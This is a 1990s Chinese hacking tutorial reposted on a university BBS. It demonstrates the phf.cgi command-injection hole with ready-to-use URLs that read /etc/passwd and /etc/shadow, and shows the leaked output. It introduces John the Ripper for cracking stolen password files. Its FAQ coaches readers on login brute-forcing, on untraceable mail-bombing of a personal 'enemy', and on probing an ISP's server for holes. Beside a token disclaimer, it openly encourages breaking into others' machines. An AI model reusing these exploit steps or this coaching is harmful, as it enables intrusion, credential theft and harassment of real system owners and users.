荔园在线

荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀

[回到开始] [上一篇][下一篇]


发信人: hbo (奥妙), 信区: Hacker
标  题: 网络hacking入门(6)
发信站: 深大荔园晨风站 (Thu Jan 15 23:23:29 1998), 转信

CoolHC Volume 6 By CoolFire         Author E-Mail: coolfire@cyberspace.org

[For Big-5 Chinese Mode Only]                           Released 4-25-1997

这不是一个教学文件, 只是告诉你该如何破解系统,
好让你能够将自己的系统作安全的保护, 如果 你能够将这份文件完全看完,
你就能够知道电脑骇客们是如何入侵你的电脑, 我是  CoolFire, 写
这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password
若有人因此文件 导致恶意入侵别人的电脑或网路, 本人概不负责 !!

在昨天, 我们的首页造访人数破万了~~ 应该是增加了很多人,
而不是有人故意灌水的吧? 希望新 朋友们能喜欢我们的内容, 有人问到:
有没有跟我们首页性质相近的中文站台? 很遗憾的是目前 我还没有找到....
看得到的大多是软体, 注册机之类的破解站台. 如果你也有这样的站台的话,
欢迎你写信给我们进行连结. 有很多网友报怨档案抓不下来,
先前我们已经尽了很大的努力将档 案放在国内 Server 中, 我想, 由 HiNet
连这边应该很快吧? 还是水管塞住的问题?? 如果有人 的位址在 .edu.tw 附近的,
欢迎来信要求 Mirror~~ 我很乐意将档案 Mirror 给你, 让其它网
友更方便取这些档案.

好久没有再弄出一些文章出来了, 不过最近倒是回了蛮多关於 Hacker 方面的问题,
也收到了许多 的回应信件, 有许多的问题在这一篇文章中都会有答案,
甚至到现在还有很多的网友们询问甚麽 是 shadow password 的,
请各位多翻翻以前的文章吧!! 在 CGI Holes 方面的问题也很多, 所以在
这一篇之後我会找个时间写一写 System Holes #2
来让大家对一些网路上常见的程式漏洞有一些基 本的认识.

最近有许多软体更新了, 最令我们注意的当然就是 NT 4.0 罗,
因为它的更新肯定会带来很多的 人更新系统,
当然这样先进的作业系统我们还是很期待有人会很快的将它的 Bugs 找出来的啦!!
UpYours 这套重量级的 MailBomb 也出现的新的版本, 这次的 V4.0 Beta 2
经试用後发现实在是 改进了很多, 但是相对的危险性也跟著提高, 其改用 Delphi
来设计, 使得安装更为方便, 不过 美中不足的是 beta2 的版本有些功能尚未改好,
光看到功能就让人哈翻了~~:) 这套 beta2 的版 本目前在我们的首页上可以找得到,
相信它的正式版本很快就会完成~~

关於 MailBomb: 我们的首页上所提供的 MailBomb 仅供大家作为测试用,
请勿拿来开玩笑或是对别人 的信箱进行轰炸, 日前此类事件造成某些的 ISP 当机,
慎至还有导致 Mail Server 记忆体不足的情 况 (哪个人这麽狠??),
我们也发现最近网路越来越慢了, 因为水管上积了太多要跟我们抢宽度的垃圾 信件.
请大家以学习的心来使用这些 Bombs... 不要没事就拿来炸人好吗 ?? Then enjoy
new one~

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
*-*-*-*-*-*-*- [CGI Hole (phf.cgi) 的延伸]

这次的主题想了好久, 一直都没有想到,
不过日前有一个屋漏偏逢连夜雨的某国营事业, 在几经下X雨 及漏X的风波之後,
在他们的主机上发现了很好玩的状况, 原本我们在使用 phf.cgi 来抓 /etc/passwd
的时候, 在 Browser 的 Location 中是下:

   http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/passwd

root:x:0:1:0000-Admin(0000):/:/sbin/sh daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin: sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000):/var/adm: lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/: uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls: nadm:x:45:2::/usr/bin:/sbin/sh
iuucp:x:46:5::/usr/lib/uucp/uucico:/sbin/sh nobody:x:60001:60001:uid no
body:/: noaccess:x:60002:60002:uid no access:/:
gopher:x:100:1::/usr/local/bin:/usr/local/bin/GopherUserScript
news:x:105:100::/usr/local/etc/innd:/usr/lib/rsh ftp:x:106:101:Anonymous
FTP:/export/ftp:/bin/false hanshin:x:109:1::/home1/hanshin:/usr/lib/rsh
dayeh:x:110:1::/home1/dayeh:/usr/lib/rsh
ming:x:133:1::/home1/ming:/usr/bin/ksh
charlesl:x:139:1::/home1/charlesl:/usr/lib/rsh
iiimail:x:142:6::/home/iiimail:/usr/lib/rsh
charles.lo:x:156:1::/home1/charles.lo:/usr/lib/rsh
webmaster:x:161:1::/home1/webmaster:/usr/lib/rsh
mark:x:171:1::/home1/mark:/usr/lib/rsh
jcteam:x:172:1::/home1/jcteam:/usr/lib/rsh
ibgchen:x:224:1::/home1/ibgchen:/usr/lib/rsh

但是如果没有, 或是 shadow 的话, 你可能会接著试:

   http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/shadow

Query Results

/usr/local/bin/ph -m alias=x /bin/cat /etc/shadow

但是有时候虽然 phf.cgi 这个程式的漏洞没有被补上,
还是有很多的机器不理会这个指令, 不过当这 个指令生效, 但是你看到的却是一个
shadow 过的 passwd 的时候, 请不要灰心, 因为这台机器已经在 你的手中了,
为甚麽呢 ?? 我们来玩看看一些简单的 Unix shell command 你就会知道了~~

   http://www.somewhere.com/cgi-bin/phf?Qalias=x%0a/bin/ls%20-l%20-a%20/etc

Query Results

/usr/local/bin/ph -m alias=x /bin/ls -l -a /etc


total 466 -rw-r--r--   1 root     root           38 May  2  1996
#etcnamed.boot# -rw-r--r--   1 root     root        20579 May  1  1996
#sendmail.cf# drwxr-xr-x  11 root     root         2048 Apr 17 13:07 .
drwxr-xr-x  24 root     root         1024 Mar 26 08:16 .. -rw-r--r--   1
root     root         2167 Aug 24  1995 DIR_COLORS -rw-r--r--   1 root
root           15 May  1  1996 HOSTNAME -rw-r--r--   1 root     root

4 Feb 24  1993 NETWORKING -rw-r--r--   1 root     root           48 Dec 30
1994 NNTP_INEWS_DOMAIN -rw-r--r--   1 root     root            0 May 13
1994 at.deny drwxr-xr-x   2 root     root         1024 Apr 11  1996 backups
-rw-r--r--   1 root     root         1212 Jul 10  1993 bootptab -rw-r--r--
1 root     root            0 Feb 15  1994 csh.cshrc -rw-r--r--   1 root
root          893 Apr 12  1996 csh.login drwxr-xr-x   2 root     root
1024 Apr 16  1996 default -rw-r--r--   1 root     root          154 Aug 21
1994 exports -rw-r--r--   1 root     root            0 May 13  1995
fastboot -rw-r--r--   1 root     root         1118 Jan 28  1994 fdprm
drwxr-xr-x   2 root     root         1024 Apr 12  1996 fs -rw-r--r--   1
root     root          250 Dec  9 19:19 fstab -rw-r--r--   1 root     root

242 Dec  5 13:55 fstab~ -rw-r--r--   1 root     root         1915 Jan 27
07:46 ftpaccess -rw-r--r--   1 root     root          368 Aug  1  1994
ftpconversions -rw-r--r--   1 root     root            0 Aug  9  1994
ftpgroups -rwxr-xr-x   1 root     root           50 May  1  1996 ftponly
-rw-r--r--   1 root     root          501 Apr 26  1996 ftpusers -rw-r--r--
1 root     root           76 Aug 21  1994 gateways -rw-r--r--   1 root
root          669 May 19  1994 gettydefs -rw-r--r--   1 root     root
291 Jun  6  1996 group -rw-r--r--   1 root     root           27 Jul  7
1994 host.conf -rw-r--r--   1 root     root          628 Jul 12  1996 hosts
-rw-r--r--   1 root     root          600 Jan  6 10:18 hosts.allow
-rw-r--r--   1 root     root          341 May  9  1996 hosts.deny
-rw-r--r--   1 root     root          313 Mar 16  1994 hosts.equiv
-rw-r--r--   1 root     root          302 Sep 23  1993 hosts.lpd -rw-r--r--
1 root     root          653 Apr 24  1996 hosts~ lrwxrwxrwx   1 root
root            1 Apr 12  1996 inet -> . -rw-r--r--   1 root     root
3677 Jan  6 10:20 inetd.conf -rw-r--r--   1 root     root         3664 Apr
23  1996 inetd.conf~ -rw-r--r--   1 root     root         2351 Apr 18  1996
inittab -rw-r--r--   1 root     root         2046 Jul 28  1994
inittab.gettyps.sample -rw-r--r--   1 root     root           27 Apr 17
12:43 issue -rw-r--r--   1 root     root            3 Apr 17 12:43
klogd.pid -rw-r--r--   1 root     root         1223 Apr 17 12:43
ld.so.cache -rw-r--r--   1 root     root           71 Aug 14  1995
ld.so.conf drwxr-xr-x   2 root     root         1024 Apr 12  1996 lilo
-rw-r--r--   1 root     root          479 Apr 13  1996 lilo.conf -rw-r--r--
1 root     root          479 Apr 13  1996 lilo.conf.bak -rw-r--r--   1 root

root          266 Apr 17 12:42 localtime -rw-r--r--   1 root     root
76873 Oct 17  1995 magic -r--r--r--   1 root     root          105 May  8
1994 mail.rc -rw-r--r--   1 root     root           14 Apr 17 12:43 motd
drwxr-xr-x   2 root     root         1024 Aug  1  1994 msgs -rw-r--r--   1
root     root          151 Apr 17 20:43 mtab -rw-r--r--   1 root     root

833 Jun 29  1994 mtools -r--r--r--   1 root     root          974 Apr 17
11:48 named.boot -r--r--r--   1 root     root         2568 May  2  1996
named.boot,v -r--r--r--   1 root     root          764 Mar  8 16:54
named.boot.v1 -r--r--r--   1 root     root          813 Mar 17 08:45
named.boot.v2 -r--r--r--   1 root     root          521 Apr 18  1996
named.boot.~1.3~ -r--r--r--   1 root     root          566 Apr 19  1996
named.boot.~1.4~ -r--r--r--   1 root     root          566 Apr 19  1996
named.boot.~1.5~ -r--r--r--   1 root     root          707 Mar  5 08:32
named.boot.~1.6~ -rw-r--r--   1 root     root          566 Apr 19  1996
named.boot~ -rw-r--r--   1 root     root          235 May  1  1996 networks
-rw-r--r--   1 root     root          237 Apr 24  1996 networks~ -rw-r--r--
1 root     root            0 May  8  1995 nntpserver -rw-r--r--   1 root
root           36 Sep 12  1994 organization -rw-r--r--   1 root     root

1727 Apr 17 13:07 passwd -r--r--r--   1 root     root         1662 Apr 17
13:06 passwd- -rw-r--r--   1 root     root         1715 Apr 17 13:06
passwd.OLD -rw-r--r--   1 root     root         1494 Feb 12 14:22
passwd.old -rw-r--r--   1 root     root         1354 Jun  6  1996 passwd~
drwxr-xr-x   2 root     root         1024 Jul  9  1994 ppp -rw-r--r--   1
root     root         2240 May 20  1994 printcap -rw-r--r--   1 root
root         1083 Apr 12  1996 profile -rw-r--r--   1 root     root
595 Aug 21  1994 protocols drwxr-xr-x   2 root     root         1024 Jan  3
23:59 rc.d -rw-r--r--   1 root     root           41 May  1  1996
resolv.conf -rw-r--r--   1 root     root           65 Jan 31  1996
resolv.conf~ -rw-r--r--   1 root     root          743 Aug  1  1994 rpc
-rw-r--r--   1 root     root           87 Jun  6  1996 securetty -r--r--r--
1 root     root        20579 May  1  1996 sendmail.cf -r--r--r--   1 root
root        21332 May  1  1996 sendmail.cf,v -rw-r--r--   1 root     root

20541 Apr 13  1996 sendmail.cf~ -rw-r--r--   1 root     root          408
Apr 25 17:17 sendmail.st -rw-r--r--   1 root     root         5575 Aug  1
1994 services -rw-r--r--   1 root     root           68 Jun  6  1996 shells
drwxr-xr-x   3 root     root         1024 Nov 13  1994 skel -rw-r--r--   1
root     root          314 Jan 10  1995 slip.hosts -rw-r--r--   1 root
root          342 Jan 10  1995 slip.login -rw-r--r--   1 root     root

455 Aug  1  1994 snooptab -rw-------   1 root     users         524 Jul 18
1996 ssh_host_key -rw-r--r--   1 root     users         327 Jul 18  1996
ssh_host_key.pub -rw-------   1 root     users         512 Mar 10 09:03
ssh_random_seed -rw-r--r--   1 root     users         607 Jul 18  1996
sshd_config -rw-r-----   1 root     root          501 Apr 26  1996
syslog.conf -rw-r--r--   1 root     root            3 Apr 17 12:43
syslog.pid -rw-r--r--   1 root     root       183942 Aug  9  1995 termcap
-rw-r--r--   1 root     root          126 Nov 24  1993 ttys lrwxrwxrwx   1
root     root           13 Apr 12  1996 utmp -> /var/adm/utmp drwxr-xr-x
2 root     root         1024 Aug 25  1995 vga lrwxrwxrwx   1 root     root

13 Apr 12  1996 wtmp -> /var/adm/wtmp -rw-r--r--   1 root     root
76 May  8  1995 yp.conf.example lrwxrwxrwx   1 root     root            7
Apr 12  1996 zprofile -> profile

上面的 %20 所代表的是 [Space] 也就是空白键啦! 那上面这个 Location
就如同我们已经 Telnet 到 这台机器上, 下了: ls -l -a /etc 这个指令一样,
嗯... 也就是说....$^^*^$@@# OK! 当你抓 /etc/passwd 所抓到的是 shadow 过的
passwd 档, 你一定会要抓真正的 shadow 档来作 "配对" 的动作... 所以呢, 下了
ls 指令来找找看到底真的 shadow 是藏在哪里, 当然你可以看的不 只是 /etc
这个目录, 任何目录你都可以看, 当然你可以使用的也不只是 cat 及 ls
这两个指令, 你 可以用更多的指令~~ 那麽还有甚麽作不到的呢 ???
我想可能还是有很多哩~~ 因为 phf.cgi 好像只 把你所下的指令丢给 shell
後直接拦下它输出的结果, 也就是如果像是 /bin/passwd userid 这样的
指令就不能用~ 因为它会要等你输入下一个字串~~ 除非先写入一个档案,
然後用来代入 "<".. 嗯.. 最近很忙, 没有空作这些无聊事, 不过 phf.cgi
还真的蛮好玩的, 我已经试了好几台机器都可以看到 文件内容及档案, 目录...
当然~ 没有破坏就是了~~

经过这样的说明, 你是不是有些 Idea ?? 还是记起以前有试过其它的机器的 phf.cgi
也可以这样子 玩的 ?? 嗯~ 再连过去玩玩看吧! 发挥一下你的想像力~~ /etc/passwd
很容易就可以得手的喔~~ 对 了~ 不要乱搞政府机关 or 你们的学校啦!!~~
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
*-*-*-*-*-*-*- [Crack 工具介绍] John the Ripper V1.4 [Size:743K]

记得先前一直介绍大家使用 CJack V1.4 来破解密码档, 那是因为它 "够快", 在
Encrypt 的速度及 比对的速度上实在快了很多,
但是之後由於很多网友的作业环境是在 Windows 95 之下, 所以 Jack 不能跑,
我们就介绍大家使用 John the Ripper V1.1 这个 Passwrod Cracker~ 现在这套
Cracker 出了新的版本了, 经过我们的试用觉得应该好好的为它介绍一番,
原来一直声称速度上比 CJack14 还要快的 John, 经过实际上的测试,
总感觉速度没有 Jack 来得快, 虽然作者声称是因为他们这支 程式是以 486
机器作最佳化的, 在 386 上跑起来会比较慢, 但是旧的 V1.1 实在是比 Jack 还要慢
这也是大家都看得到的事实.

而 1.4 版在 EnCrypt 上实在是下了点功夫, 也对 Win32 版本有了支援,
当你下载解开後会发现里 面有 DOS.ZIP WIN32.ZIP SOURCE.TGZ 这三个档, 分别是在
DOS 下使用的版本, Win95,NT 下使用的 版本及 Unix 下使用的版本,
这时针对你所运用的作业环境作个选择, 将档案解开即可直接使用.

你还要再解开 COMMON.ZIP(共用档) 及 DOC.ZIP(说明档),
经过测试速度上明显提升很多, 但是我不 敢讲它比 Jack 要快多少, 至少在我的
Pentium 133 的机器上跑起来觉得差不多, 也没有谁比较快 谁比较慢的感觉~~
不过以这样的档案大小 (7xxK) 能同时包含三种作业系统, 实在是不错的选择!!

当然这个程式里面只含了一个小小的字典档供你测试,
想要发挥它最大的效能还是先要有一个不错的 字典档,
但是新的版本中可以让你设定自动产生序数及字串比对(之前的好像也有吧?),
至於如何操 作, 我想他跟 Jack 及前一版本的操作方法相同, 就不用再多作介绍了~~
以下是它的执行画面:

John the Ripper  Version 1.4  Copyright (c) 1996,97 by Solar Designer

Usage: john [flags] [passwd files] Flags: -pwfile:<file>[,..]     specify
passwd file(s) -wordfile:<file> -stdin wordlist mode, read words from
<file> or stdin -rules                  enable rules for wordlist mode
-incremental[:<mode>]   incremental mode [using john.ini entry <mode>]
-single                 single crack mode -external:<mode>        external
mode, using john.ini entry <mode> -restore[:<file>]       restore session
[from <file>] -makechars:<file>       make a charset, <file> will be
overwritten -show                   show cracked passwords -test

perform a benchmark -users:<login|uid>[,..] crack this (these) user(s) only
-shells:[!]<shell>[,..] crack users with this (these) shell(s) only
-salts:[!]<count>       crack salts with at least <count> accounts only
-lamesalts              assume plaintext passwords were used as salts
-timeout:<time>         abort session after a period of <time> minutes
-list                   list each word -beep -quiet            beep or
don't beep when a password is found -noname -nohash         don't use
memory for login names or hash tables -des -md5               force DES or
MD5 mode

有没有看到最後一行? 有 MD5 mode 的支援了哩~~~ 嗯.. 介绍完了! 当然!
这支程式我们也传回来了, 你可以在我们的首页找到, 或者你也可以试 者 archie
看看有哪些 ftp site 有, 它的档名是 ucfjohn3.zip   ENJOY~

-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-
*-*-*-*-*-*-*-

**** CoolFire FAQ ****

许多东西没有空整理, 但是还是收集了一部分的问答出来,
如果这边有的就不要再来信询问了喔!!

[Q0]我抓了 KOS 但是抓到 1.2MB 左右就停了, 不晓得哪里还可以抓到.
[A0]如果你是想要我们站上 KOS 中的字典档, 那麽很报歉, 因为这东西只有本站的
KOS 中有包, 在别的地方抓到的 KOS 不含我们这个字典档 (这是我们自己加料过的,
其它程式相同), 这也 是为甚麽首页上的 KOS 如此大了~ 如果你所要的是 KOS
的程式, 那麽你可以到 www.yahoo.com 这个搜寻引擎中找 "globalkos" 这个字串,
会有很多地下站台的列表, 接著你就可以在这些地 方找一个连线速度较快的主机抓取
KOS 了~~

[Q1]我尝试用 NETTERM 及 LetMeIn 进入自己所建立的糸统(SCO Unix V). 1.
因为帐号是本人的,所以我将密码放於在字典档第三行内. 2.
在LetMeIn中选定我的字典档. 3.   在NETTERM中输入我的帐号,然後按输入键. 4.

在Password 的出现後回到LetMeIn. 5.      按Start Break. 6.       当Delay
Time到了,键盘上的"NumLock"闪过不停, 不过,过了第三行(猜想 ...
很久)也没有反应.老是停在Password这个浮标傍. 7.
当再选LetMeIn後看见字典档内的字逐一出现於最低的行内. 这好像没有按输入键.
请替我解答,可以麽? 还想问问在那里可找到新的LetMeIn 及ClayMore版本 多谢帮忙.
[A1] 1. 连上主机, 待 user: 出现时不用输入你的 user id. 2. 启动 LetMeIn 1.0
选定字典档 3. 在 Setup Keys 中输入你的 User ID 并加上一个 '~' 号(代表 Enter
4. 在 After Keys 中输入 '~' 号, 表示密码输入完也要按 Enter. 5. 按下 Start
Break, 在时间倒数完毕前将滑鼠点一下 telnet (Netterm) 程式视窗,
等待自动输入~~~~ :)

ps... 以上.. 更正一下你的操作方式, 并请如果弄懂了 LetMeIn 的操作
方式时帮我写一下说明... 因为有太多人的操作都错了~~ 不晓得是不
是我的说明写得太差了哩 ??? LetMeIn 及 ClayMore 目前都未出新版本, LetMeIn
2.0 的赶工还在加强中 (有 TCP/IP 部分的支援).

***
[Q2]我download了kabomb3.0,但又怕给查出来...我在网上有一个很嚣张的敌人呢!
[A2]KaBoom 3.0 经测试无法 Fake IP, 所以很可能会被查出来~~~ 不过要看 isp 配
不配合抓~~~ 也就是说因为拨接是动态 Ip, 较不容易查出(需透过 ISP)...但是如
果是假借它人帐号拨接, 又要看电信局配不配合抓了.


[Q3]那麽有没有完全不会被查出的email bomber呢?:-) [A3]Windows 上的
AnonyMailer 就是了~~ 但没有强大的炸人功能~~ 用途为发一般 之匿名信件,
或是你可找 Unix 上的Bomb Script..在 Unix 上炸... 再不.. 就试 装 UpYours
罗~:)

*** [Q4]I can't get the email bomb files except the kabomb..Can you help me
solve this problem? [A4]You can download it from my site. If there's some
problem, you can mail me~

*** [Q5] I trust that the GlobalKOS just down ..so I can get the KOS crack
files. Can you tell where I can get or put the file in your homepage?
Thanks you for you attention.. [A5]对~ 经过连结测试该 Server
好像已经没有回应了, 目前已将 Global KOS 档 案整理好放置於首页上供大家下载,
原先是遵重作者的反应不得放连结的, 现 在由於该 Server 停掉了,
所以就将档案放上来罗~ 快抓吧!

*** [Q6]ShaDow 系唔系唔可以解o架 !? 有o既话用边个程式呀 ? 点样先可以做到呢
? [A6]You can use deshadow like program to De-Shadow the shadowed file. Or
you can use 'ypcat ' command to view the shadowed file. But almost ISP have
been fix the hole.  Good Luck.

[Q7]我个ISP 用 SUN/OS , □D Sercuity 好劲o架 ! 我想睇□D档案时 , 会出现
Permission Denied , 我咪用 More / Less ! 然後用 ftp 想睇 , 用<!cat> 又唔准
! get file 都唔得 ! 我知□个Passwd 档摆系边都罗唔到 ! □请问
你又有无办法去罗□个档案啊 ! [A7]SUN OS ?? You should to check that system
again and tell me what version is it ? And you should check what ftp deamon
and what http deamon and sendmail version. You should check everything
about that server and try to found every hole would be in that system. And
try to get into the system. After you get in. get more information from
that server.

[Q8]我系你度罗o左个Guess Cracking Program ! 不过我都系唔知点样用□ !
我Upload 晒所有档案上去ISP Server 度 ! 然後就按 cc -o guess getpwdent.c
<-例如 □就 话我D规格错误 ! 搅到我用唔到 ! [A8]some ISP did not support c
compiler function. So you should check about it.

[Q9]点样o既档案先可以系 SUN / OS 度用嫁 ? 我搅o黎搅去都整唔到执行档 !
咪就系 Guess 个程式罗 ! [A9]Sun OS always use shadow program. And the
shadowed file may not found in /etc directory, And may called '.shadow'.
try found it in other directory.

[Q10]Global Kos 个Server 系咪有问题啊 ? 我上极去都上唔到啊 !
如果唔介意可唔可以 Attach个档案俾我啊 ? [A10]There's a little problem to
that server. and i think it have been shut-down a while. So i will be put
the program in my home page.

[Q11]Crack Jack 1.4 系唔系可以系 Sun/Os Or Unix 度用o架 ?
我有个朋友叫我用□系个 Server 做Crack Password  ! 但系我就唔知点样可以用DOS
o既 *.exe 档系SUN/Os OR UNIX 度执行 ! [A11]CJack is running under dos mode.
And it could not run under unix mode. So if you want crack some password
file. FTP it and put it into a dos OS machine. Run CJack!
当然如果你坚持要在 Unix 系统下跑的话, 还是有这种软体 的, 最近新版的 John
the Ripper V1.4 就有附 Source Code 可以让你在你的主机 上面 Compiler....
但前提是你必须要有 c compiler 的权限呀~~ 快找一台机器吧!

*** [Q12]我对hacker这门课有些兴趣(虽然我一窍不通:-P ).想请教您几个问题:
我使用 " John the Ripper V1.0 " 来crack一个名叫 "passwd"的密码档,
但是很奇怪的,我执行後,显示了一些字,就跳回DOS了.好像根本没有执行crack的动作.
您能帮小弟找出原因吗? 画面如下: C:\Hacker>john -beep -w:123.txt passwd John
the Ripper  Version 1.0  Copyright (c) 1996 by Solar Designer Loaded 0
accounts with 0 different salts C:\Hacker>
123.txt是"字典档"(其实是四,五十个ID); passwd则是我们的"目标:密码档.
[A12]很正确的指令, 不过 0 accounts with 0 different salts 就有点怪了~~~
据我的判断你的 passwd 档是 shadow 过的档, 没有用~~~~ 所以 John 找不到
"有效的" 资料来判读~~~ 新版的 John 有一个 UnShadow.exe 的档案, 据说可
用来组合 shadow 及 passwd 使其还原, 不过前提还是要两个档都抓到, 如果
只抓到一个档是没有用的!! 记得上次有个软体声称其注册版可以解 shadow..
应改也是必需要先抓到 shadow 档吧!~~ 不过这好像没有甚麽意义呀~~

[Q13]您听过一个叫: LANWATCH 的软体吗?
我听说它可以:过滤(拦截)Internet上的封包 资料,并可"监视"使用者的一举一动?!
哇!!!太帅了!您有它的相关资料吗? [A13]No~~ 没玩过~~ 不过你是用拨接上线吗 ???
那就别想了~~~~:)

[Q14]我这里有个
浏览器的Bomb(用java写的).据我自己(太牺牲了...)的测试,不论你是
用Netscape或MSIE, 它都会让你的浏览器一直重复开很多个视窗,直到记忆体耗完
为止!!! :-P 不知您有无兴趣想要看看? [A14]我也有个可 FORMAT C: 的 JAVA...
不过没用就是了~~ 哈哈~ 这种东西少玩.... 我宁愿多破几间站台~~~ 嘻:::::::
快把 Java Option 关掉吧! 免得以後看我的 Page 会 Formatting ?? <--
开玩笑啦~~~

*** [Q15] 感谢您在网页上的资讯造福了我们这些刚入门的新手 ^_^
根据您提供的方法,成功的取得 Linux.xxxxxxx.xxxx.xxx.tw 的 /etc/passwd 并找出
n 个 password ..... 但我在 tknet.tku.edu.tw 却碰了大钉子 ...:(  他们的
/etc/passwd 是 shadows 的, 我猜真正的 password 可能在/etc/master.passwd ,
但我没权限读取它 .... 经尝试了您网页提供的 3 个 Unix & Linux 的漏洞仍无效.
不知您有没有方法解决被 shadow 的 passwd....??  提供一个帐号您可进去看 ...
login: ******  password: **** (这是淡大的密码格 式: 4位数字) 另,在 bbs 的
security 版有人提出现在的 www cracker 法:
www.xxx.xxx/cgi-bin/phf?Qalias=x%0aless%/20/etc/passwd 问题是出在 phf ,
您知不 知道他的意思? [A15] phf 的漏洞是在於 phf 本身自己的 Bug,
它并不会检查你的 UID, 且它执行了 system() 这个指令,
所以我们就可以利用它来作一些只有 root 才可以作的一些事情, 这是一个很
大的漏洞, 现在很多 ISP 都已经将此漏洞补上了~~~~
这一篇文章中的说明应该就很清楚 了吧??

**** 後语 ****

** 不要 Crack 这个首页的 ISP!!!! 否则 FETAG Sofeware's Hacking Page
将会完全关闭, 再 也不寻找其它的地方来放置, 希望给你的是使用电脑的 "知识",
不要利用它来夺取任何的 "权利", 本首页著重的是教育,
而不是一□的教导攻击的方法, 希望大家对於政府机关 (org.tw) 或教育机构
(edu.tw) 不要作任何的破坏!! 还有我的 ISP......:D 谢谢大家的支持~

------ 我们的首页上日前更新後增加一个网友交流板,
这个板的目的是让网友们可以在上面作些讨论, 如果 你常上我们的首页,
请看一下板上有没有问题是你能够回答的? 如果有也请不吝啬的发言, 造福大家 喔~~
网友交流板 需要你的支持~~

------ 再次重申, Crack 别人站台之後不要破坏别人站台中的资料,
此篇文章仅作为教育目的, 不主张你随 便入侵他人主机.... (高-Net 还是除外)...
请勿将这类技术使用於破坏上 (又... 如果第三次世界 大战开打,
你可以任意破坏敌国的电脑网路... 我全力支持),
最严重的情况(如果你真的很讨厌该主 机的话)... 就将它 Shut Down.... 好了!
别太暴力了!

      My Mail Address: coolfire@cyberspace.org 或是写到
fetag.cyberspace.org (回信较快) Home Page: www.showtower.com.tw/~fetag 中的
Hackker&Mailer 区

--
※ 来源:.深大荔园晨风站 bbs.szu.edu.cn.[FROM: 202.192.140.143]


[回到开始] [上一篇][下一篇]

荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店